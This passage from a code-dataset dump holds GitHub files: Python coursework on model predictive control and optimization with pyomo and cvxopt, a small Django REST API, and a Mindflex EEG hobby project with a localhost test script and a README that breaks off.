pt.Polytope(tmp.A @ A, tmp.b)\n\ndef Oinf(A, Xset):\n \n Omega = Xset\n k = 0\n Omegap = precursor(Omega, A).intersect(Omega)\n while not Omegap == Omega:\n k += 1\n Omega = Omegap\n Omegap = pt.reduce(precursor(Omega, A).intersect(Omega))\n return Omegap\n\n# remeber to convet input constraits in state constraints\nS = X.intersect(pt.Polytope(U.A @ -Finf, U.b))\n# maximal positive invariant set \n\nO_inf = Oinf(Acl, S) \n\n# %% maximal control invariant set \ndef Cinf(A, B, Xset, Uset):\n \n Omega = Xset\n k = 0\n Omegap = precursor(Omega, A, Uset, B).intersect(Omega)\n while not Omegap == Omega:\n k += 1\n Omega = Omegap\n Omegap = precursor(Omega, A, Uset, B).intersect(Omega)\n return Omegap\nC_inf = Cinf(A, B, X, U)\n\n# %% initial feasible set \n\nN = 3\n\nC = {}\nPreS = precursor(O_inf, A, U, B)\nfor j in range(N):\n C[j]= PreS.intersect(X)\n PreS = precursor(C[j], A, U, B)\n\nX0 = C[N-1] \n# The initial feasible set X0 is equivalent to the N-step controllable set. 
\n\n# %% plot \n# Plotting and Comparison\nplt.clf()\nplt.cla()\nplt.close('all')\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n\nX.plot(ax, color='m', alpha=0.1, linestyle='solid', linewidth=1, edgecolor=None) # state constraint set\nC_inf.plot(ax, color='m', alpha=0.6, linestyle='solid', linewidth=1) # maximal control invariant set \nX0.plot(ax, color='y', alpha=0.7, linestyle='solid', linewidth=1) # initial feasible set \nO_inf.plot(ax, color='g', alpha=0.7, linestyle='solid', linewidth=1) # maximal positive invariant set \nax.legend(['X', 'Cinf', 'X0', 'Oinf'])\n\nax.autoscale_view()\n# ax.axis('equal')\nplt.show()\n\n# %%\n# simulation with MPC \n\nimport pyomo.environ as pyo\n\nXf = O_inf\nAf = Xf.A\nbf = Xf.b\n\nQ = np.eye(2)\nR = np.array([1]).reshape(1,1)\nP = Pinf # play here with different P\nN = 3\nx1U = np.pi/4\nx2U = np.pi/2\nuU = np.pi/10\nx0 = np.array([-0.5, 1])\n\ndef solve_cftoc(A, B, P, Q, R, N, x0, x1U, x2U, uL, uU, bf, Af):\n \n model = pyo.ConcreteModel()\n model.N = N\n model.nx = np.size(A, 0)\n model.nu = np.size(B, 1)\n model.nf = np.size(Af, 0)\n \n # length of finite optimization problem:\n model.tIDX = pyo.Set( initialize= range(model.N+1), ordered=True ) \n model.xIDX = pyo.Set( initialize= range(model.nx), ordered=True )\n model.uIDX = pyo.Set( initialize= range(model.nu), ordered=True )\n \n model.nfIDX = pyo.Set( initialize= range(model.nf), ordered=True )\n \n # these are 2d arrays:\n model.A = A\n model.B = B\n model.Q = Q\n model.P = P\n model.R = R\n model.Af = Af\n model.bf = bf\n \n # Create state and input variables trajectory:\n model.x = pyo.Var(model.xIDX, model.tIDX)\n model.u = pyo.Var(model.uIDX, model.tIDX, bounds=(uL,uU))\n \n #Objective:\n def objective_rule(model):\n costX = 0.0\n costU = 0.0\n costTerminal = 0.0\n for t in model.tIDX:\n for i in model.xIDX:\n for j in model.xIDX:\n if t < model.N:\n costX += model.x[i, t] * model.Q[i, j] * model.x[j, t] \n for t in model.tIDX:\n for i in model.uIDX:\n for j in model.uIDX:\n if t < model.N:\n costU += model.u[i, t] * model.R[i, j] * model.u[j, t]\n for i in model.xIDX:\n for j in model.xIDX: \n costTerminal += model.x[i, model.N] * model.P[i, j] * model.x[j, model.N]\n return costX + costU + costTerminal\n \n model.cost = pyo.Objective(rule = objective_rule, sense = pyo.minimize)\n \n # Constraints:\n def equality_const_rule(model, i, t):\n return model.x[i, t+1] - (sum(model.A[i, j] * model.x[j, t] for j in model.xIDX)\n + sum(model.B[i, j] * model.u[j, t] for j in model.uIDX) ) == 0.0 if t < model.N else pyo.Constraint.Skip\n \n\n model.equality_constraints = pyo.Constraint(model.xIDX, model.tIDX, rule=equality_const_rule)\n model.init_const1 = pyo.Constraint(expr = model.x[0, 0] == x0[0])\n model.init_const2 = pyo.Constraint(expr = model.x[1, 0] == x0[1])\n model.state_limit1 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[0, t] <= x1U\n if t < N else pyo.Constraint.Skip)\n model.state_limit2 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x1U <= model.x[0, t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit3 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[1, t] <= x2U\n if t < N else pyo.Constraint.Skip)\n model.state_limit4 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x2U <= model.x[1, t]\n if t < N else pyo.Constraint.Skip)\n \n def final_const_rule(model, i):\n return sum(model.Af[i, j] * model.x[j, model.N] for j in model.xIDX) <= model.bf[i] \n \n model.final_const = pyo.Constraint(model.nfIDX, rule=final_const_rule)\n \n solver = 
pyo.SolverFactory('ipopt')\n results = solver.solve(model)\n \n if str(results.solver.termination_condition) == \"optimal\":\n feas = True\n else:\n feas = False\n \n xOpt = np.asarray([[model.x[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n uOpt = np.asarray([model.u[:,t]() for t in model.tIDX]).T\n \n JOpt = model.cost()\n \n return [model, feas, xOpt, uOpt, JOpt]\n\n[model, feas, xOpt, uOpt, JOpt] = solve_cftoc(A, B, P, Q, R, N, x0, x1U, x2U, -uU, uU, bf, Af)\n\n# Setup the simulation with MPC controller\n\nnx = np.size(A, 0)\nnu = np.size(B, 1)\n\nM = 25 # Simulation steps\nxOpt = np.zeros((nx, M+1))\nuOpt = np.zeros((nu, M))\nxOpt[:, 0] = x0.reshape(nx, )\n\nxPred = np.zeros((nx, N+1, M))\npredErr = np.zeros((nx, M-N+1))\n\nfeas = np.zeros((M, ), dtype=bool)\nxN = np.zeros((nx,1))\n\nfig = plt.figure(figsize=(9, 6))\nfor t in range(M):\n [model, feas[t], x, u, J] = solve_cftoc(A, B, P, Q, R, N, xOpt[:, t], x1U, x2U, -uU, uU, bf, Af)\n \n if not feas[t]:\n xOpt = []\n uOpt = []\n predErr = []\n break\n # Save open loop predictions\n xPred[:, :, t] = x\n\n # Save closed loop trajectory\n # Note that the second column of x represents the optimal closed loop state\n xOpt[:, t+1] = x[:, 1]\n uOpt[:, t] = u[:, 0].reshape(nu, )\n\n # Plot Open Loop\n line1 = plt.plot(x[0,:], x[1,:], 'r--')\n\n# Plot Closed Loop\nline2 = plt.plot(xOpt[0, :], xOpt[1, :], 'bo-')\nplt.legend([line1[0], line2[0]], ['Open-loop', 'Closed-loop']);\nplt.xlabel('x1')\nplt.ylabel('x2')\nplt.axis('equal')\nplt.show()\n\n# Plotting the polytopic sets and the closed loop trajectory \nplt.clf()\nplt.cla()\nplt.close('all')\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n\nX.plot(ax, color='m', alpha=0.1, linestyle='solid', linewidth=1, edgecolor=None) # state constraint set\nC_inf.plot(ax, color='m', alpha=0.6, linestyle='solid', linewidth=1) # maximal control invariant set \nX0.plot(ax, color='y', alpha=0.7, linestyle='solid', linewidth=1) # initial feasible set \nO_inf.plot(ax, color='g', alpha=0.7, linestyle='solid', linewidth=1) # maximal positive invariant set \nax.legend(['X', 'Cinf', 'X0', 'Oinf'])\n\nax.plot(xOpt[0, :], xOpt[1, :], 'bo-', markerfacecolor='none', markeredgewidth=0.5, linewidth= 0.5, label='traj') # closed loop trajectory \nax.plot(xOpt[0, 0], xOpt[1, 0], 'ro', label='init') # the initial condition x0\n\nax.autoscale_view()\n# ax.axis('equal')\nplt.show()"
},
{
"alpha_fraction": 0.5615951418876648,
"alphanum_fraction": 0.5996952056884766,
"avg_line_length": 23.30864143371582,
"blob_id": "b3a949c37ce1da481c3f26ec2a15063ef27f6593",
"content_id": "89de963d350eab1717bc348ff0e82a9af8d1a679",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3937,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 162,
"path": "/py_files/unicycle.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# optimal control of a unicycle with pyomo\n\nimport matplotlib.pyplot as plt \nimport numpy as np \n \nfrom pyomo.dae import *\nfrom pyomo.environ import *\n\nTs = .05\nN = 50 \nTFinal = Ts*N\nNx = 3 \nNu = 2 \n\n# x' = vcos(theta); y' = vsin(theta), theta' = w\n# u = [v,w]\n\nimport pyomo.environ as pyo \n\nmodel = pyo.ConcreteModel()\nmodel.tidx = pyo.Set(initialize = range(N+1))\nmodel.xidx = pyo.Set(initialize = range(Nx))\nmodel.uidx = pyo.Set(initialize = range(Nu))\n\nmodel.z = pyo.Var(model.xidx, model.tidx)\nmodel.u = pyo.Var(model.uidx, model.tidx)\n\n# the objective can be different \nmodel.obj = pyo.Objective(\n expr = sum(model.u[0,t] **2 for t in model.tidx if t <N),\n sense = pyo.minimize\n)\n\nUdotLim = .03 \nz0 = [0,0,0]\nzf = [1,1,np.pi/4]\n\nmodel.cons1 = pyo.Constraint(\n model.xidx, rule = lambda model,i:\n model.z[i,0] == z0[i]\n)\nmodel.cons2 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.z[0,t+1] == model.z[0,t] + Ts *(pyo.cos(model.z[2,t])* model.u[0,t]) if t < N else pyo.Constraint.Skip\n)\nmodel.cons3 = pyo.Constraint(\n model.tidx, rule =lambda model,t:\n model.z[1,t+1] == model.z[1,t] + Ts* (pyo.sin(model.z[2,t])* model.u[0,t]) if t < N else pyo.Constraint.Skip \n)\nmodel.cons4 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.z[2,t+1] == model.z[2,t] + Ts * model.u[1,t]\n if t<N else pyo.Constraint.Skip\n)\n\nmodel.cons5 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[0,t] <=1 \n if t<N-1 else pyo.Constraint.Skip\n)\n# pay attention to N-1 here ----------------\nmodel.cons6 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[0,t] >= -1 \n if t<N-1 else pyo.Constraint.Skip\n)\nmodel.cons7 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[1,t] <= 1 \n if t<N-1 else pyo.Constraint.Skip\n)\nmodel.cons8 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[1,t] >= -1 \n if t<N-1 else pyo.Constraint.Skip\n)\nmodel.cons9 = pyo.Constraint(\n model.xidx, rule = lambda model,i: \n model.z[i,N] == zf[i]\n)\nresults = pyo.SolverFactory('ipopt').solve(model).write()\n\nz1 = [model.z[0,0]()]\nz2 = [model.z[1,0]()]\nz3 = [model.z[2,0]()]\nu1 = [model.u[0,0]()]\nu2 = [model.u[1,0]()]\n\nfor t in model.tidx:\n if t<N:\n z1.append(model.z[0,t+1]())\n z2.append(model.z[1,t+1]())\n z3.append(model.z[2,t+1]())\n if t<N-1:\n u1.append(model.u[0,t+1]())\n u2.append(model.u[1,t+1]())\n\nplt.figure(1)\nplt.plot(z1,z2,'b')\n# plt.show()\n\nm = pyo.ConcreteModel()\nm.tf = pyo.Param(initialize = TFinal)\nm.t = ContinuousSet(bounds = (0,m.tf))\nm.u1 = Var(m.t, initialize = 0)\nm.u2 = Var(m.t, initialize = 0)\nm.z1 = Var(m.t)\nm.z2 = Var(m.t)\nm.z3 = Var(m.t)\nm.dz1dt = DerivativeVar(m.z1, wrt=m.t)\nm.dz2dt = DerivativeVar(m.z2, wrt=m.t)\nm.dz3dt = DerivativeVar(m.z3, wrt=m.t)\n\nm.z1dot = Constraint(\n m.t, rule = lambda m,t:\n m.dz1dt[t] == pyo.cos(m.z3[t]) * m.u1[t]\n)\nm.z2dot = Constraint(\n m.t, rule = lambda m,t:\n m.dz2dt[t] == pyo.sin(m.z3[t]) * m.u1[t]\n)\nm.z3dot= Constraint(\n m.t, rule = lambda m,t:\n m.dz3dt[t] == m.u2[t]\n)\nm.cons1 = Constraint(\n m.t, rule = lambda m,t:\n m.u1[t] <= 1 \n)\nm.cons2 = Constraint(\n m.t, rule = lambda m,t:\n m.u1[t] >= -1 \n)\nm.cons3 = Constraint(\n m.t, rule = lambda m,t:\n m.u2[t] <= 1 \n)\nm.cons4 = Constraint(\n m.t, rule = lambda m,t:\n m.u2[t] >= -1 \n)\ndef _init(m):\n yield m.z1[0] == z0[0]\n yield m.z2[0] == z0[1]\n yield m.z3[0] == z0[2]\nm.init_conditions = ConstraintList(rule=_init)\n\ndef _end(m):\n yield m.z1[m.tf] == zf[0]\n 
yield m.z2[m.tf] == zf[1]\n    yield m.z3[m.tf] == zf[2]\nm.end_conditions = ConstraintList(rule=_end)\n\nTransformationFactory('dae.finite_difference').apply_to(m, wrt=m.t, nfe=30)\n# Solve algebraic model\nresults = SolverFactory('ipopt').solve(m)\n\n\nplt.figure(1)\nplt.title('trajectory')\nplt.plot([value(m.z1[t]) for t in m.t], [value(m.z2[t]) for t in m.t],'o')\nplt.show()
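\n\n# Added check (sketch): the endpoint of the collocation solution should hit zf\nprint('final state:', value(m.z1[m.tf]), value(m.z2[m.tf]), value(m.z3[m.tf]))\n"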
},
{
"alpha_fraction": 0.7453415989875793,
"alphanum_fraction": 0.7639751434326172,
"avg_line_length": 19.125,
"blob_id": "fbb64300e11ce8d8845f59b4783074773e74e09a",
"content_id": "f22340ae995000f9edeeb2fef8e13d0252265e3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/README.md",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# Intro\n\nThis is a repo for UC Berkeley C231 class\n\n# Content\n\nincluding the lab file and solution to homework etc.\nfor lab file python version: check py_files.\n"
},
{
"alpha_fraction": 0.4649406671524048,
"alphanum_fraction": 0.5106077194213867,
"avg_line_length": 18.047945022583008,
"blob_id": "db0a0f6036da0e0e506a17c6f05b6d3716fbed7e",
"content_id": "999ad34414bd89fbd6b43fcfaaad99601e502c2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2781,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 146,
"path": "/py_files/lab2_optimization_cvxpy.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# solving linear and quadratic programming using cvxopt\n\n# %% Linear programming example \n\nimport numpy as np \nimport cvxopt \n\n\nc = np.ones(3)\nG = np.array(\n [[-1,0,0],\n [0,-1,0],\n [0,0,-1],\n [-1,1,-1]]\n)\nh = np.array([2,1,3,-4])\nc = cvxopt.matrix(c,tc = 'd')\nG = cvxopt.matrix(G,tc = 'd')\nh = cvxopt.matrix(h,tc = 'd')\n\nsol = cvxopt.solvers.lp(c,G,h)\nxOpt = sol['x']\nJ = sol['primal objective']\n# print(xOpt)\n# print(J)\n\n# %% quadratic programs and constrained least-squares exercise \n\nn= 5\nA = np.random.randn(n,n)\nb = np.random.randn(n)\nl_i = -.5\nu_i = .5\n\nP = 2 * A.T @ A \nq = -2 * A.T @ b\n# G = np.vstack((np.eye(n),-np.eye(n)))\nG = np.concatenate([np.eye(n),-np.eye(n)],axis=0)\nh = np.concatenate([u_i*np.ones((n,)),-l_i* np.ones((n,))],axis=0)\n# h = np.hstack((u_i*np.ones((n,)),-l_i* np.ones((n,))))\n# h = np.vstack((u_i*np.ones((n,1)),-l_i* np.ones((n,1))))\n#### 1D array can be (n,1) or (1,n) ######\n\nP = cvxopt.matrix(P, tc='d')\nq = cvxopt.matrix(q, tc='d')\nG = cvxopt.matrix(G, tc='d')\nh = cvxopt.matrix(h, tc='d')\nsol = cvxopt.solvers.qp(P,q,G,h)\n\n# print('x*=', sol['x'])\n# print('p*=', sol['primal objective'] + b.T@b)\n\n\n# %% exercises \n\n# n = 2\n# c = np.array([3,2])\n# G = -np.eye(2)\n# h = np.array([0,0]).reshape(n,1)\n\n\n# n = 2\n# c = np.array([1,0])\n# G = -np.eye(2)\n# h = np.array([0,0]).reshape(n,1)\n\n\n\n# c = np.array([-5,-7])\n# G = np.array([\n# [-3,-2],\n# [-2,1],\n# [-1,0],\n# [0,-1]\n# ])\n# h = np.array([30,12,0,0]).reshape(4,1)\n\nc = np.array([3,1])\nG = np.array([\n [1,-1],\n [3,2],\n [2,3],\n [2,-3],\n [0,-1],\n [-1,0]\n])\nh = np.array([1,12,3,-9,0,0])\n\nc = cvxopt.matrix(c, tc='d')\nG = cvxopt.matrix(G, tc='d')\nh = cvxopt.matrix(h, tc='d')\n\nsol = cvxopt.solvers.lp(c,G,h)\nxOpt = sol['x']\nJ = sol['primal objective']\n# print(xOpt)\n# print(J)\n\n# %% quadratic exercises\n\n# P = 2 * np.eye(2)\n# q = np.zeros((2,1))\n# G = -np.eye(2)\n# h = np.array([-1,-1]).reshape((2,1))\n\n# P = 2 * np.diag([2,7])\n# q = np.zeros((2,1))\n# G = np.diag([-1,1])\n# h = np.array([3,2])\n\n# P = 2 * np.eye(2)\n# q = np.zeros((2,1))\n# G = np.array([\n# [1,0],\n# [0,1],\n# [4,3]\n# ])\n# h = np.array([-3,4,0])\n\n\n# P = cvxopt.matrix(P,tc = 'd')\n# q = cvxopt.matrix(q,tc = 'd')\n# G = cvxopt.matrix(G,tc = 'd')\n# h = cvxopt.matrix(h,tc = 'd')\n\n# sol = cvxopt.solvers.qp(P,q,G,h)\n# print('x* = ',sol['x'])\n# print('J* = ',sol['primal objective'])\n\nP = np.diag([1,1,0.1])\nq = np.array([0,0,.55])\nG = -np.eye(3)\nh = np.zeros((3,1))\nA = np.ones((1,3))\nb = np.ones(1)\n\nP = cvxopt.matrix(P,tc = 'd')\nq = cvxopt.matrix(q,tc = 'd')\nG = cvxopt.matrix(G,tc = 'd')\nh = cvxopt.matrix(h,tc = 'd')\nA = cvxopt.matrix(A,tc = 'd')\nb = cvxopt.matrix(b,tc = 'd')\n\nsol = cvxopt.solvers.qp(P,q,G,h,A,b)\nprint('x* = ',sol['x'])\nprint('J* = ',sol['primal objective'])\n"
},
{
"alpha_fraction": 0.46443966031074524,
"alphanum_fraction": 0.506465494632721,
"avg_line_length": 22.225000381469727,
"blob_id": "3371267b7f55a531ca1c3e864ede9d626a5d5522",
"content_id": "727f7846d0215646ae814362d932278a6d2e0da4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 40,
"path": "/midterm_exam/B2.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport cvxopt\n\n\ndef reg1Inf(A_in,b_in,c_in,d_in):\n # the question transformed to:\n # min(x1,x2,x3,t){t}\n # t = max(|A_in *x - b_in|)\n\n n_1, nx = np.shape(A_in)\n\n c = np.array([0]*nx + [1])\n A = np.concatenate(\n [\n np.concatenate([A_in,-np.ones((2,1))],axis=1),\n np.concatenate([-A_in,-np.ones((2,1))],axis=1),\n np.concatenate([c_in,np.zeros((2,1))],axis= 1)\n ],axis = 0\n )\n\n b = np.concatenate([b_in,-b_in,d_in],axis=0)\n\n c = cvxopt.matrix(c,tc='d')\n A = cvxopt.matrix(A,tc='d')\n b = cvxopt.matrix(b,tc='d')\n\n\n sol = cvxopt.solvers.lp(c,A,b)\n xOpt = sol['x']\n J = sol['primal objective']\n return xOpt[:nx],J \n\n\na = np.array([[2,0,-1],[1,-1,0]])\nb = np.array([1,2]).reshape((2,1))\nc = np.array([[1,-1,1],[-1,-1,0]])\nd = np.array([-1,-1]).reshape((2,1))\nxOpt, J = reg1Inf(a,b,c,d)\nprint('xOpt: ',xOpt)\nprint('J* = ',J)"
},
{
"alpha_fraction": 0.5688164830207825,
"alphanum_fraction": 0.6126994490623474,
"avg_line_length": 24.5,
"blob_id": "2e1b0840ae71bf0c7379f560fe02cb101fbd9132",
"content_id": "8342ec2828db1ba9ff75bfa254e5cc37b104cc21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3008,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 118,
"path": "/py_files/Lab5_NCFTOCP.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# nonlinear constrained finite time optimal control \n\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport pyomo.environ as pyo \n\nTau = 0.2 \nGamma = 10 \nTs = 0.05 \nN = 120 \nTFianl = Ts * N \n\nNx = 2\nNu = 1 \nUdotLim = 0.03\n\ndef disc_dyn(x,u):\n x_next = np.empty((Nx,))\n x_next[0] = x[0] + Ts*(np.sin(x[0]) + Gamma * np.arctan(x[1]))\n x_next[1] = x[1] + Ts / Tau * (x[1] - u)\n return x_next\n\ntValues = [0,3,3.5,5.5,6]\nxDesValues = [0, 0.75*np.pi/4, 0.67*np.pi/4, 1.25*np.pi/4, 1.25*np.pi/4]\n\nfrom scipy import interpolate\n\nf = interpolate.interp1d(tValues,xDesValues,'linear')\ntGrid = np.linspace(tValues[0],tValues[-1],N+1)\nxDesired = f(tGrid)\n\n# plt.scatter(tGrid,xDesired)\n# plt.show()\n\nmodel = pyo.ConcreteModel()\nmodel.tidx = pyo.Set(initialize = range(N+1))\nmodel.xidx = pyo.Set(initialize = range(Nx))\nmodel.uidx = pyo.Set(initialize = range(Nu))\n\nmodel.x = pyo.Var(model.xidx, model.tidx) \nmodel.u = pyo.Var(model.uidx, model.tidx)\n\nmodel.cost = pyo.Objective(\n expr = sum((model.x[0,t] - xDesired[t])**2 for t in model.tidx if t<N),\n sense = pyo.minimize\n)\n\n# constraints \nmodel.cons1 =pyo.Constraint(\n model.xidx, rule = lambda model, i:\n model.x[i,0] == 0\n)\nmodel.cons2 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.x[0,t+1] == model.x[0,t]+ Ts * (pyo.sin(model.x[0,t]) + Gamma * pyo.atan(model.x[1,t])) if t<N else pyo.Constraint.Skip\n)\nmodel.cons3 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.x[1,t+1] == model.x[1,t] + Ts/Tau * model.x[1,t] - model.u[0,t]\n if t < N else pyo.Constraint.Skip\n)\n\nmodel.cons4 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.u[0,t+1] - model.u[0,t] >= -Ts * UdotLim\n if t<N-1 else pyo.Constraint.Skip\n)\n\nmodel.cons5 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.u[0,t+1] - model.u[0,t] <= Ts * UdotLim\n if t<N-1 else pyo.Constraint.Skip\n)\n\n# model.cons6 = pyo.Constraint(\n# expr = model.x[0,N] -xDesired[N] <= 0.025* xDesired[N]\n# )\n\n# model.cons7 = pyo.Constraint(\n# expr = -0.025* xDesired[N] <= model.x[0,N] -xDesired[N] \n# )\nmodel.constraint6 = pyo.Constraint(expr = 0.975*xDesired[N] - model.x[0, N] <= 0.0)\nmodel.constraint7 = pyo.Constraint(expr = model.x[0, N] - 1.025*xDesired[N] <= 0.0)\n\nresult = pyo.SolverFactory('ipopt').solve(model)\n\nx1 = [model.x[0,0]()]\nx2 = [model.x[1,0]()]\nu = [model.u[0,0]()]\n\nfor t in model.tidx:\n if t<N:\n x1.append(model.x[0,t+1]())\n x2.append(model.x[1,t+1]())\n if t<N-1:\n u.append(model.u[0,t+1]())\n\n# plt.figure()\n# plt.plot(tGrid, x1,'b')\n# plt.plot(tGrid, x2,'g')\n# plt.plot(tGrid[0:-1], u,'r')\n# plt.show()\n\n\nx_actual = np.zeros((Nx,N+1))\nfor t in range(N):\n x_actual[:,t+1] = disc_dyn(x_actual[:,t],u[t])\n\nplt.figure()\nplt.plot(tGrid,x_actual[0,:],'b')\nplt.plot(tGrid,xDesired,'g')\nplt.plot(tGrid,x1,'--r')\nplt.legend(['Actual','Desired','open-loop'])\nplt.xlabel('Time')\nplt.ylabel('x1 Trajectory')\nplt.show()\n\n# --------------result is abnormal -------------"
}
] | 19 |
usmanafridi/Django_APIBASIC | https://github.com/usmanafridi/Django_APIBASIC | b5ea192bb8f76d95e1d9be0490cdb5dbc2cb7dc9 | c9ef54e9b7647925a270c8e248cfac49a5cd8317 | ee28db1e274132bcfffd4a018061792f986cbef9 | refs/heads/main | 2023-08-24T11:38:08.250776 | 2021-11-02T11:44:39 | 2021-11-02T11:44:39 | 423,821,626 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 19,
"blob_id": "d9a719cdba2ce2833c8ddedede9d938eacc02caa",
"content_id": "b4bcd8847fd64e6f4cef1bc9da88922dc32f0c66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 1,
"path": "/README.md",
"repo_name": "usmanafridi/Django_APIBASIC",
"src_encoding": "UTF-8",
"text": "\"# Django_APIBASIC\" \n"
},
{
"alpha_fraction": 0.8286852836608887,
"alphanum_fraction": 0.8286852836608887,
"avg_line_length": 21.81818199157715,
"blob_id": "803fc9221aaf67090048ba4f637ad91f71db5083",
"content_id": "edc0aeb12029fe7713f28a0d06d678d8782e410a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/api/views.py",
"repo_name": "usmanafridi/Django_APIBASIC",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom rest_framework import generics\nfrom books.models import Book\n\nfrom .serializers import BookSerializer\n\n\nclass BookAPIView(generics.ListAPIView):\n\tqueryset= Book.objects.all()\n\tserializer_class= BookSerializer\n"
},
{
"alpha_fraction": 0.8011049628257751,
"alphanum_fraction": 0.8011049628257751,
"avg_line_length": 21.625,
"blob_id": "c7f09d4d3cf2e1575e048fcf6f72e4d47718c83a",
"content_id": "b02979249e53f7d744ca241a5935d11aa2fa0033",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/books/views.py",
"repo_name": "usmanafridi/Django_APIBASIC",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.views.generic import ListView\nfrom .models import Book\n\nclass BookListView(ListView):\n\tmodel= Book\n\ttemplate_name= 'book_list.html'\n"
}
] | 3 |
calebbarr/MindflexAlpha | https://github.com/calebbarr/MindflexAlpha | 77e383f3e9bc45e94fc60a67e48af41f6feab984 | ae683c9f4af44dad8f0218cb415ba8c49fb72e1e | 4544adc1a152c53d49bcb76c262acc3c0f27411e | refs/heads/master | 2021-01-20T09:32:40.112054 | 2018-07-25T17:56:16 | 2018-07-25T17:56:16 | 21,874,179 | 3 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6576728224754333,
"alphanum_fraction": 0.6930860280990601,
"avg_line_length": 24.826086044311523,
"blob_id": "bd1b734b7aa6d111bddd632c60aaa9890265688f",
"content_id": "4b6097296118a5d67dce4147e6aca5ffe0aa5358",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 23,
"path": "/extra/mindflex_test.py",
"repo_name": "calebbarr/MindflexAlpha",
"src_encoding": "UTF-8",
"text": "from random import randint as r\nimport socket\n\nfrom twisted.internet import reactor\nfrom twisted.internet import task\n\n\ndef sendFakeBrainwaves():\n brainwaves = \",\".join(\n [str(x) for x in \\\n [0] +\\\n [r(0,100) for x in range(2)] +\\\n [r(0,100000) for x in range(8)]\n ])+\"\\n\"\n print brainwaves\n clientsocket.send(brainwaves)\n\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserversocket.bind(('localhost', 9990))\nserversocket.listen(1)\nclientsocket, address = serversocket.accept()\ntask.LoopingCall(sendFakeBrainwaves).start(1.0)\nreactor.run()"
},
{
"alpha_fraction": 0.7137585878372192,
"alphanum_fraction": 0.7706905603408813,
"avg_line_length": 85.2272720336914,
"blob_id": "a8fb27ff23c4056970b3cf859f2628df1b71d1de",
"content_id": "17bc7958113dc169f1e7279a12b1940ffa9e0d00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1897,
"license_type": "no_license",
"max_line_length": 505,
"num_lines": 22,
"path": "/README.md",
"repo_name": "calebbarr/MindflexAlpha",
"src_encoding": "UTF-8",
"text": "#MindflexAlpha\n\nStreaming analytics on brain waves, extensible to various applications. Requires a modified Mindflex EEG.\n\n## modifying the Mindflex\n\n* Use Arduino IDE to flash the [sketch](https://github.com/calebbarr/MindflexAlpha/blob/master/embedded/MindflexAlphaArduinoSketch.pde) onto an [Arduino Fio](http://arduino.cc/en/Main/ArduinoBoardFio). It depends on the [Arduino Brain Library](https://github.com/kitschpatrol/Brain). You may need to hit [reset](http://stackoverflow.com/a/20735393/1215687) at the correct time.\n* Connect the T pin on the [Neurosky daughterboard](http://frontiernerds.com/files/imagecache/full-screen/t-pin-soldered.jpg) of a [Mindflex](http://www.ebay.com/sch/i.html?_from=R40&_trksid=p2050601.m570.l1313.TR0.TRC0.H0.Xmindflex+duel+replacement+headset&_nkw=mindflex+duel+replacement+headset&_sacat=0) headset to the [D2](http://www.instructables.com/file/F49LH28GZLW9939) pin of the Fio. Connect [ground](http://frontiernerds.com/files/imagecache/full-column/4492255397_b86e4a8b56_o.jpg) to ground.\n* Connect a [Bluetooth Bee](http://www.seeedstudio.com/depot/Bluetooth-Bee-p-598.html) and a [LiPo battery](https://www.sparkfun.com/products/731).\n\n## communicating with the 